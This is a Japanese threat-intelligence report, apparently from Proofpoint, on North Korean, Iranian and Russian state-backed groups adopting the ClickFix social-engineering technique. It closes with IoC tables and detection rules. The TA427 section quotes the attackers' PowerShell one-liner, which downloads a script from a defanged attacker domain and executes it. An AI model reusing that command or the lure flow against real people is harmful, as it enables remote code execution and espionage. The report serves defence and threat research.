Europe connect

90日間世界一周: 国家に支援された攻撃者がClickFixを試す

Share with your network!

主な調査結果

  • 主にサイバー犯罪 攻撃者に関連する技術として知られているClickFixソーシャルエンジニアリング技術ですが、プルーフポイントのリサーチャーは、複数のキャンペーンにおいて国家支援を受けた攻撃グループが初めてこの技術を使用していることを発見しました。2024年末から2025年初めにかけてのわずか3ヶ月の間に、北朝鮮、イラン、ロシアのグループが日常的な活動でClickFixのテクニックを使っているのが目撃されています。
  • ClickFixの導入は、TA427、TA450、UNK_RemoteRogue、TA422のキャンペーンに革命をもたらすものではなく、既存の感染チェーンにおけるインストールと実行の段階を置き換えるものです。
  • 現時点では、ClickFixの使用は一部の国家的支援を受けた攻撃グループに限られていますが、昨年来のサイバー犯罪やここ数ヶ月のスパイ活動においてClickFixの人気が高まっていることから、この手法が国家的支援を受けた攻撃グループによってより広くテストされたり、採用されたりするようになる可能性が高いと考えられます。

     

概要

脅威ランドスケープの主要なトレンドの一つは、戦術、技術、手順(TTPs)の流動性です。脅威アクターは、公開されている攻撃手法や他の脅威グループとの相互作用を通じて、TTPsを共有、模倣、盗用、採用、テストします。特に、国家支援型アクターは、サイバー犯罪者によって最初に開発・展開された技術を活用することがよくあります。例えば、北朝鮮の脅威アクターは政府のために暗号通貨を盗む目的で、サイバー犯罪から技術を模倣しています。また中国のグループはスパイ活動の一環としてマルウェアを配信するために、サイバー犯罪の感染チェーンを真似ています

このトレンドの最新の例がClickFixです。ClickFixは、ターゲットのマシン上で悪意あるコマンドをコピー、ペースト、実行させるために、指示付きのダイアログボックスを使用するソーシャルエンジニアリング技術です。この独創的な技術は、偽のエラーメッセージを問題として提示するだけでなく、OSからの公式な警告と指示という形で解決策も提供します。主にサイバー犯罪活動で確認されたClickFix技術は、2024年3月初旬に初めて初期アクセスブローカーであるTA571とClearFakeクラスターによって使用され、その後、脅威ランドスケープに広がりました

その1年後、少なくとも4つの国家支援型の脅威アクターが、通常のスパイ活動キャンペーンの一環として、この技術のバリエーションを試しています。2024年10月から2025年1月までのおよそ3ヶ月間に、北朝鮮、イラン、ロシアの3か国を起源とする脅威アクターが、感染チェーンの一部としてClickFixを組み込みました。

 

北朝鮮:TA427

2025年1月と2月に、プルーフポイントは初めてTA427のオペレーターがシンクタンク部門の5つ未満の組織を標的に、ClickFix技術を使った新たな感染チェーンを使用することを観察しました。TA427は、他のベンダがKimsukyまたはEmerald Sleetと呼ぶ活動と重複しています。

TA427は、従来から北朝鮮問題に取り組んでいる標的に対し、なりすましの送信者から会議のリクエストを送り、最初の接触を行いました。TA427がよく用いる手法のように、標的との短いやり取りを通じて信頼を築いた後、攻撃者が管理するウェブサイトへ誘導し、そこで標的にPowerShellコマンドを実行させました。一つの感染チェーンは追加のペイロード取得に失敗しましたが、別のケースでは、PowerShell、VBS、バッチスクリプトを実行する多段階のチェーンを経由し、最終的にはQuasarRATというサイバー犯罪活動でもよく見られる一般的なマルウェアが配信されました。

感染チェーンの概要は以下の図で示されています。

TA427 ClickFix infection chains

TA427のClickFix感染チェーン(チェーン1 - 実線、チェーン2 – 点線)

 

配信方法

2025年2月、TA427のオペレーターは日本の外交官になりすまし、標的に対してワシントンD.C.の日本大使館で駐米大使の山田重夫氏との会議を設定するよう依頼するメールを送りました。

無害な添付ファイル付きのTA427による最初の接触

無害な添付ファイル付きのTA427による最初の接触

メールには「Letter from Ambassador Cho Hyun-Dong.pdf」という無害な添付ファイルがあり、件名は「[Japanese Embassy] Meeting Request」でした。その後、標的の個人および業務用メールアカウントとのやり取りを経て、攻撃者は悪意のあるメールを追加で送りました。

悪意のある添付ファイルを含むTA427からの返信

悪意のある添付ファイルを含むTA427からの返信

攻撃者からの返信メールには標的の名前を含むタイトルのPDFファイルが添付されており、このPDFには、セキュアドライブであると偽装した動的DNSドメインのサブドメインを使用したランディングページへのリンクが含まれていました。

 悪意あるリンクを含むPDF添付ファイルの誘導

悪意あるリンクを含むPDF添付ファイルの誘導

ランディングページには「Questionnaire.pdf」という偽のPDFファイルがホストされていました。

偽のPDFをホストするランディングページ

偽のPDFをホストするランディングページ

標的がこの偽のPDFをダウンロードしようとすると、別のページにリダイレクトされました。ポップアップの警告が表示され、ドキュメントを見るためには登録が必要であると促しました。

「登録」ダイアログボックス

「登録」ダイアログボックス

ユーザーが登録ボタンをクリックすると、以下に示すようにコードの入力を促す別のポップアップが表示され、登録方法の指示もありました。

コードとPowerShellコマンド実行指示が含まれるダイアログボックス

コードとPowerShellコマンド実行指示が含まれるダイアログボックス

ユーザーは以下のように、登録コードとして表示されたPowerShellコマンドを手動でコピーし、ターミナルで実行する必要があります。

      powershell -windowstyle hidden -Command iwr
      "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile
      "$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex
      $c;                                                                    
               3Z5TY-76FR3-9G87H-7ZC56

ClickFixのPowerShellコマンドは、リモートでホストされた2つ目のPowerShellコマンドを取得し、実行します。このコマンドは、チェーンの前段階で言及した偽装用のPDF(Questionnaire.pdf)をユーザーに表示します。ドキュメントは日本の外務省からのものと称しており、北東アジアにおける核拡散および政策に関する質問が含まれていました。

偽装用のQuestionnaire.pdf

偽装用のQuestionnaire.pdf

2つ目のPowerShellスクリプトは、temp.vbsというVBSスクリプトを作成し、「Update-out-of-date-20240324001883765674」という名前のスケジュールされたタスクによって19分ごとに実行されます。また、「Update-out-of-date-20240324001883765675」という2つ目のスケジュールされたタスクも作成され、20分ごとにVBSスクリプトを実行するよう設定されましたが、このVBSスクリプトは存在せず、このタスクの目的は不明です。

このチェーンではスケジュールされたタスクの実行以降は何も起きませんでしたが、2025年1月に観察された別のチェーンは類似の経路を辿り、追加の手順が含まれていました。このケースでは、最初のスケジュールされたタスクが最終的に2つのバッチスクリプトをダウンロードし、さらに2つの新しいPowerShellスクリプトと難読化されたペイロードを作成・デコードしました。

2つ目のバッチスクリプトは、新たに作成されたPowerShellスクリプトを実行し、最終的にBase64およびXORエンコードされたQuasarRATのペイロードをデコードしました。このペイロードは、コマンド&コントロール(C2)のIPアドレス38.180.157[.]197とポート80で通信を行いました。TA427は感染チェーンに新しい技術を採用しましたが、このグループは少なくとも4年間、一般に公開されているツールであるQuasarRATを使用しています。プルーフポイントは、この活動をインフラの重複、TTPs、マルウェアに基づきTA427によるものと特定しています。

 

ネットワークインフラの分析

配信インフラのさらなる調査により、非常に類似したテーマを持つ複数のサーバーやステージングURLが発見されました。また、プルーフポイントの研究者はTA427がこのキャンペーンで日本語、韓国語、英語のコンテンツを使用しており、送信者のなりすましに合わせてカスタマイズされていることを確認しました。以下は2025年1月中旬に観察された、韓国語でのセキュアドライブを偽装した例です。

2025年1月中旬の偽装されたセキュアドライブの例

2025年1月中旬の偽装されたセキュアドライブの例

TA427はこのキャンペーンで主に韓国にあるサーバー上でホストされた動的DNS(DDNS)サービスを使用しており、これらのサーバーはおそらく侵害されているとみられます。攻撃者は全てのケースでFreeDNSまたはNo-IP DDNSサービスを使用し、サブドメインとしてセキュアドライブまたはアカウントプロファイルを偽装していました。この活動に関連するインフラは、いずれも2025年1月以降に設置されたものです。

同じ月、マイクロソフトはTA427のClickFix感染チェーンのバリエーションを観察しました。このバリエーションでも、デバイスの登録とPowerShellコマンドの実行を促すURLが使用されていました。この場合、コードはブラウザベースのリモートデスクトップツールをインストールし、被害者のデバイスを登録するための証明書とPINをダウンロードしました。TA427は数週間にわたり複数のバージョンのClickFix技術を試行した後、すぐに以前からの実績ある技術に戻ったと考えられます。

 

イラン:TA450

2024年11月13日と14日、TA450は攻撃者が管理するメールアドレスsupport@microsoftonlines[.]comを使用し、中東の少なくとも39の組織のターゲットに英語のフィッシングメールを送信しました。TA450は、第三者がMuddyWaterやMango Sandstormと呼ぶグループと重複しています。このメールは、マイクロソフトからのセキュリティ・アップデートを装い、「Urgent Security Update Required – Immediate Action Needed(緊急のセキュリティアップデートが必要です - 即時の行動が必要です)」という件名で、セキュリティの脆弱性に対処するための一連の手順を実行するよう個人を説得しました。

攻撃者は、まずPowerShellを管理者権限で実行させ、次にメール本文に含まれるコマンドをコピーして実行させることで、ClickFixの手口を展開しました。このコマンドは、リモート管理・監視(RMM)ソフトウェア(この場合はLevel)をインストールするためのもので、その後、TA450のオペレーターはRMMツールを悪用してスパイ活動を行い、標的のマシンからデータを流出させます。

感染チェーンは以下の通りです:

 TA450 ClickFix感染チェーン

TA450 ClickFix感染チェーン

11月15日、イスラエル国家サイバー局 は、攻撃者が特定のRMMツール, 「Level」をロードするコマンドを実行したと報告しました。プルーフポイントは、TA450が過去においてAtera、PDQ Connect、ScreenConnect、SimpleHelpなどの複数のRMMツールを侵入の足がかりとして使用してきたことを確認していますが、プルーフポイントのデータにおいてLevelが検出されたのはこれが初めてです。

TA450 phish (INCD)

TA450フィッシング(INCD)

このアトリビューションは、既知のTA450のTTP、キャンペーンの標的、およびマルウェア分析に基づいています。しかし、典型的なTA450 RMMキャンペーンが一貫してイスラエルの組織を標的としていたのに対し、同グループのClickFixキャンペーンはより広範囲に及んでいました。

以下のヒートマップに示されているように、プルーフポイントのリサーチャーは、TA450のターゲットが主に中東全域に分布していることを確認しています。

TA450 ClickFix campaign target heatmap

TA450によるClickFix キャンペーンのターゲットヒートマップ

標的は複数の業界に及んでいましたが、金融業界と政府機関が特に標的として人気がありました。

TA450 ClickFix target breakdown by sector

TA450 ClickFix ターゲットの業種別内訳

執筆時点において、2024年11月の最初の確認以降、TA450がClickFixを使用する追加の事例は確認されていません。ただし、TA450はその後数ヶ月間、イスラエルを標的とする典型的な行動パターンとRMM(リモート管理ツール)を活用した戦術を継続しています。
 

ロシア:UNK_RemoteRogue と TA422

北朝鮮とイランの国家機関は、ClickFixを実験している唯一の存在ではありません。UNK_RemoteRogueと特定された疑わしいロシアのグループも、2024年末に以下の感染チェーンでClickFixを使用していることが確認されました。

UNK_RemoteRogue ClickFix infection chain

UNK_RemoteRogue ClickFix 感染チェーン

2024年12月9日から、主要な防衛産業の武器製造会社と関連する2つの組織の個人を対象に、侵害されたインフラストラクチャを利用して10件のメッセージが送信される標的型キャンペーンが実施されました。これらのメッセージには件名が含まれておらず、複数の侵害された可能性のあるZimbraサーバーを中間送信インフラとして悪用し、そのサーバーが「From」フィールドを埋めました。メールには、タイトル「RSVP Office - Створюйте, редагуйте документи та діліться ними в Інтернеті」でMicrosoft Officeを偽装した悪意のあるリンクが含まれていました。”:

         hxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g

リンクの説明文は「RSVP Office - オンラインでドキュメントを作成、編集、共有」と翻訳されました。ターゲットがリンクをクリックすると、Microsoft Word ドキュメントを偽装した HTML が表示され、ロシア語で書かれた ClickFix スタイルの指示が表示され、ブラウザからコードをターミナルにコピーするように促されました。ウェブページには、PowerShell を実行する方法に関する YouTube 動画チュートリアルへのリンクが含まれていました。

UNK_RemoteRogue ClickFix landing page spoofing Microsoft Word

UNK_RemoteRogue ClickFix ランディングページが Microsoft Word を偽装している様子

ターミナルに貼り付けられたコマンドは、悪意のあるJavaScriptを実行し、その後、Empire C2フレームワークと関連付けられたPowerShellコードを実行しました。

プルーフポイントは、UNK_RemoteRogueがClickFixを使用したのは1回のみを確認し、その後、同グループは従来のキャンペーンに戻りました。これらのキャンペーンでは、侵害された中間メールサーバーの使用、同じアップストリーム送信ホスト、および非常に類似した標的選定など、多くの共通する特徴が確認されています。2025年1月、ドメインoffice[.]rsvpが5.231.4[.]94に解決され始め、このIPアドレスはukrtelcom[.]comとmail.ukrtelecom[.]euもホストしていました。これらのドメインは、同月に行われたUNK_RemoteRogueのフィッシング活動でも確認されました。DomainTools の調査 は、UNK_RemoteRogueの追加インフラストラクチャを指摘しています。

1月28日、UNK_RemoteRogueは、80.66.66[.]197をアップストリーム集約サーバーとして使用するキャンペーンで再出現し、侵害されたメールサーバーを中間送信者として継続的に悪用する同グループの傾向が確認されました。同グループは標的メールの『From』ヘッダーを偽造し、ウクライナの組織や通信・防衛企業を装い、RDPファイルを送信しました。2025年2月の後続キャンペーンでは、RDPファイルの配信を容易にするため、パスワード保護されたリンクが使用されました。

UNK_RemoteRogue phishing email with RDP attachment in January 2025

2025年1月に確認されたUNK_RemoteRogue フィッシングメール(RDP添付ファイル付き)

ターゲットのホストがリモート接続を許可している場合、ダウンロードされたファイルは、接続されたすべてのドライブを含むRDP接続を作成し、クリップボードデータとウェブ認証試行 リモートホストにリダイレクトします。Proofpoint Threat Researchのクラウドデータ調査において、2025年2月下旬に、80.66.66[.]197のIPアドレスが、米国各州政府で勤務するユーザーのOffice 365 Exchangeアカウントへのログインを試行していることが確認されました。

ClickFixの新たな目撃情報が、2024年10月17日にロシアの確立されたグループから報告されました。CERT-UAは、TA422がGoogleスプレッドシートを模倣したリンクを含むフィッシングメールを送信するのを観測しました。TA422は、第三者がSofacyとAPT28と呼ぶ活動と重なっています。これにより、reCAPTCHAの提示が表示され、クリックするとPowerShellコマンドがコピー&ペーストされ、さらにコマンドを実行するよう指示するダイアログボックスが表示されました。PowerShellはSSHトンネルを作成し、Metasploitを実行します。
 

結論

国家が支援するアクターは、他のグループを観察し模倣することで、時には帰属の混乱という便利な副産物を伴いながら、創造的で独創的な手法を採用します。国家が支援するアクターがClickFixを使用する複数の事例は、この手法が国家アクターの間で人気を博しているだけでなく、異なる国々が数週間の差で同様の手法を採用していることを示しています。

以下のタイムラインは、国家支援型アクター(TA)のキャンペーンの典型的なペースの中で、各ClickFixの検出を示しています。ほとんどのケースでは、グループはClickFixキャンペーン後に標準的なキャンペーンに戻りました。TA422は例外で、追加のキャンペーンは観察されませんでした。ただし、これはProofpointの可視性の問題によるもので、その後の活動がないためではありません。

Timeline of standard campaigns and ClickFix sightings (Jul 2024 – Mar 2025)

標準キャンペーンとClickFixの検出履歴(2024年7月~2025年3月)

他の一般的なキャンペーンが並行して継続している中、私たちは当初、この現象が国家支援型アクターがClickFix技術を試行段階にあるため、またはこの技術がマシン侵害において他の手法ほど成功しなかったためだと仮定していました。しかし、最近のプルーフポイントの調査では、グループが通常のキャンペーンを継続する中で、TA427は最初の検出から2ヶ月以上経った4月に、感染チェーンを若干変更した形でClickFixに戻ったことが判明しました。これは、TA427がClickFix技術の使用方法をさらに開発していることを示唆しており、今後数ヶ月間でさらなる事例が確認される可能性が高いと考えられます。

この技術は継続的に使用されているものではありませんが、北朝鮮、イラン、ロシアの脅威アクターがClickFixを試用またはテストした可能性があり、今後近い将来に利用する可能性もあります。この手法の世界的な拡散状況を踏まえると、Proofpointの調査において中国政府支援のアクターによるClickFixの使用が確認されていない点は目立つ特徴です。ただし、これは可視性の問題による可能性が高く、短期間で多くのアクターのキャンペーンに現れたことを考慮すると、中国関連グループがClickFixを実験的に使用した可能性は高いと考えられます。
 

IoC (Indicators of Compromise: 侵害指標)

特定のPDFのハッシュ値は、ターゲットにパーソナライズされていたため、インジケーターリストから除外されています。

TA427 Network Indicators 

Indicator 

Type 

Description 

First Seen 

yasuyuki.ebata21@proton[.]me 

Email address 

Sender email 

February 2025 

eunsoolim29@gmail[.]com 

Email address 

Sender email 

January 2025 

115.92.4[.]123 

IP 

Likely legitimate but compromised server 

January 2025 

121.179.161[.]230 

IP 

Likely legitimate but compromised server 

January 2025 

121.179.161[.]231 

IP 

Likely legitimate but compromised server 

January 2025 

172.86.111[.]75 

IP 

Likely legitimate but compromised server 

January 2025 

210.179.30[.]213 

IP 

Likely legitimate but compromised server 

January 2025 

221.144.93[.]250 

IP 

Likely legitimate but compromised server 

January 2025 

118.194.228[.]184 

IP 

Likely legitimate but compromised server 

January 2025 

14.34.85[.]86 

IP 

Likely legitimate but compromised server 

January 2025 

38.180.157[.]197 

IP 

QuasarRAT C2 

January 2025 

securedrive.networkguru[.]com 

Domain 

Payload delivery 

January 2025 

securedrive.servehttp[.]com 

Domain 

Payload delivery 

January 2025 

securedrive-mofa.servehttp[.]com 

Domain 

Payload delivery 

January 2025 

login-accounts.servehttp[.]com 

Domain 

Payload delivery 

January 2025 

accounts-myservice.servepics[.]com 

Domain 

Payload delivery 

January 2025 

securedrive.netsecgroup[.]com 

Domain 

Payload delivery 

January 2025 

securedrive.privatedns[.]org 

Domain 

Payload delivery 

January 2025 

drive.us-dos.securitel[.]com 

Domain 

Payload delivery 

March 2025 

securedrive.fin-tech[.]com 

Domain 

Payload delivery 

January 2025 

securedrive.opticalize[.]com 

Domain 

Payload delivery 

January 2025 

securedrive.dob[.]jp 

Domain 

Payload delivery 

February 2025 

accounts-porfile.serveirc[.]com 

Domain 

Payload delivery 

February 2025 

account-profile.servepics[.]com 

Domain 

Payload delivery 

February 2025 

freedrive.servehttp[.]com 

Domain 

Payload delivery 

March 2025 

e-securedrive.mofa.mtomtech.co[.]kr 

Domain 

Payload delivery 

April 2025 

securedrive.root[.]sx 

Domain 

Payload delivery 

February 2025 

myaccounts-profile.servehttp[.]com 

Domain 

Payload delivery 

April 2025 

undocs.myvnc[.]com 

Domain 

Payload delivery 

April 2025 

undocs.servehttp[.]com 

Domain 

Payload delivery 

April 2025 

raedom[.]store 

Domain 

C2 

January 2025 

hxxps://securedrive.root[.]sx:8443/us.emb-japan.go.jp/doc/eh 

URL 

Landing page 

February 2025 

hxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/alert 

URL 

ClickFix pop-up 

February 2025 

hxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/register 

URL 

ClickFix pop-up 

February 2025 

hxxps://securedrive.fin-tech[.]com/docs/en/ 

URL 

Landing page 

January 2025 

hxxps://securedrive.fin-tech[.]com/docs/en/alert 

URL 

ClickFix pop-up 

January 2025 

hxxps://securedrive.fin-tech[.]com/docs/en/register 

URL 

ClickFix pop-up 

January 2025 

hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd 

URL 

Hosting URL for PowerShell 

January 2025 

hxxps://securedrive.fin-tech[.]com/docs/en/src/pdf_0.pdf 

URL 

Hosting URL for decoy PDF 

January 2025 

hxxps://securedrive.fin-tech[.]com/docs/en/src/resp.php 

URL 

Redirect URL 

January 2025 

hxxps://raedom[.]store/[REDACTED]/demo.php?ccs=cin 

URL 

VBS script C2 

January 2025 

hxxps://bit-albania[.]com/[REDACTED]/demo.php?ccs=cin 

URL 

VBS script C2 (compromised) 

February 2025 

 

TA427 Malware Indicators 

 

 

 

 

Indicator 

Type 

Filename 

Description 

First Seen 

06816634fb019b6ed276d36f414f3b36f99b845ddd1015c2b84a34e0b8d7f083 

SHA256 

Letter from Ambassador Cho Hyun-Dong.pdf 

Lure document 

January 2025 

0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef83a716a97576e288f6dd 

SHA256 

temp.vbs 

Stager script 

January 2025 

18ee1393fc2b2c1d56d4d8f94efad583841cdf8766adb95d7f37299692d60d7d 

SHA256 

temp.vbs 

Stager script 

February 2025 

e410ffadb3f5b6ca82cece8bce4fb378a43c507e3ba127ef669dbb84e3c73e61 

SHA256 

1.bat 

Loader 

January 2025 

78aa2335d3e656256c50f1f2c544b32713790857998068a5fa6dec1fb89aa411 

SHA256 

2.bat 

Loader 

January 2025 

07a45c7a436258aa81ed2e770a233350784f5b05538da8a1d51d03c55d9c0875 

SHA256 

adobe.ps1 

Dropper 

January 2025 

f9536b1d798bee3af85b9700684b41da67ff9fed79aae018a47af085f75c9e3e 

SHA256 

mer.ps1 

Dropper 

January 2025 

85db55aab78103f7c2d536ce79e923c5fd9af14a2683f8bf290993828bddeb50 

SHA256 

Unknown 

QuasarRAT 

January 2025 

 

TA450 Network Indicators 

Indicator 

Type 

Description 

First Seen 

support@microsoftonlines[.]com 

Email address 

Sender email 

November 2024 

microsoftonlines[.]com 

Domain 

Phishing 

November 2024 

 

UNK_RemoteRogue Network Indicators 

Indicator 

Type 

Description 

First Seen 

office[.]rsvp 

Domain 

Email delivery 

December 2024 

mail.ukrtelecom[.]eu 

Domain 

Phishing 

January 2025 

ukrtelecom[.]eu 

Domain 

Phishing 

January 2025 

ukrtelecom[.]com 

Domain 

Phishing 

January 2025 

hxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g 

URL 

Landing page 

December 2024 

80.66.66[.]197 

IP 

Email delivery 

December 2024 

5.231.4[.]94 

IP  

Email delivery 

January 2025 

 

UNK_RemoteRogue Malware Indicators 

Indicator 

Type 

Description 

First Seen 

bfb11abb82ab4c788156df862a5cf4fa085f1ac3203df7a46251373d55cc587c 

SHA256 

HTML landing page 

December 2024 

8a8c57eedca1bd03308198a87cae7977d3c385f240c5c62ac7c602126a1a312f 

SHA256 

JavaScript executes PowerShell 

December 2024 

ET rules 

2061585 - ET MALWARE Observed DNS Query to TA450 Domain (microsoftonlines .com) 
2061586 - ET MALWARE Observed TA450 Domain in TLS SNI 
 
2061587 - ET MALWARE Observed DNS Query to UNK_RemoteRogue Domain 
2061588 - ET MALWARE Observed DNS Query to UNK_RemoteRogue Domain 
2061589 - ET MALWARE Observed DNS Query to UNK_RemoteRogue Domain 
2061590 - ET MALWARE Observed UNK_RemoteRogue Domain in TLS SNI 
2061591 - ET MALWARE Observed UNK_RemoteRogue Domain in TLS SNI 
2061592 - ET MALWARE Observed UNK_RemoteRogue Domain in TLS SNI 
 
2061593 - ET MALWARE Observed DNS Query to TA427 Domain 
2061594 - ET MALWARE Observed TA427 Domain in TLS SNI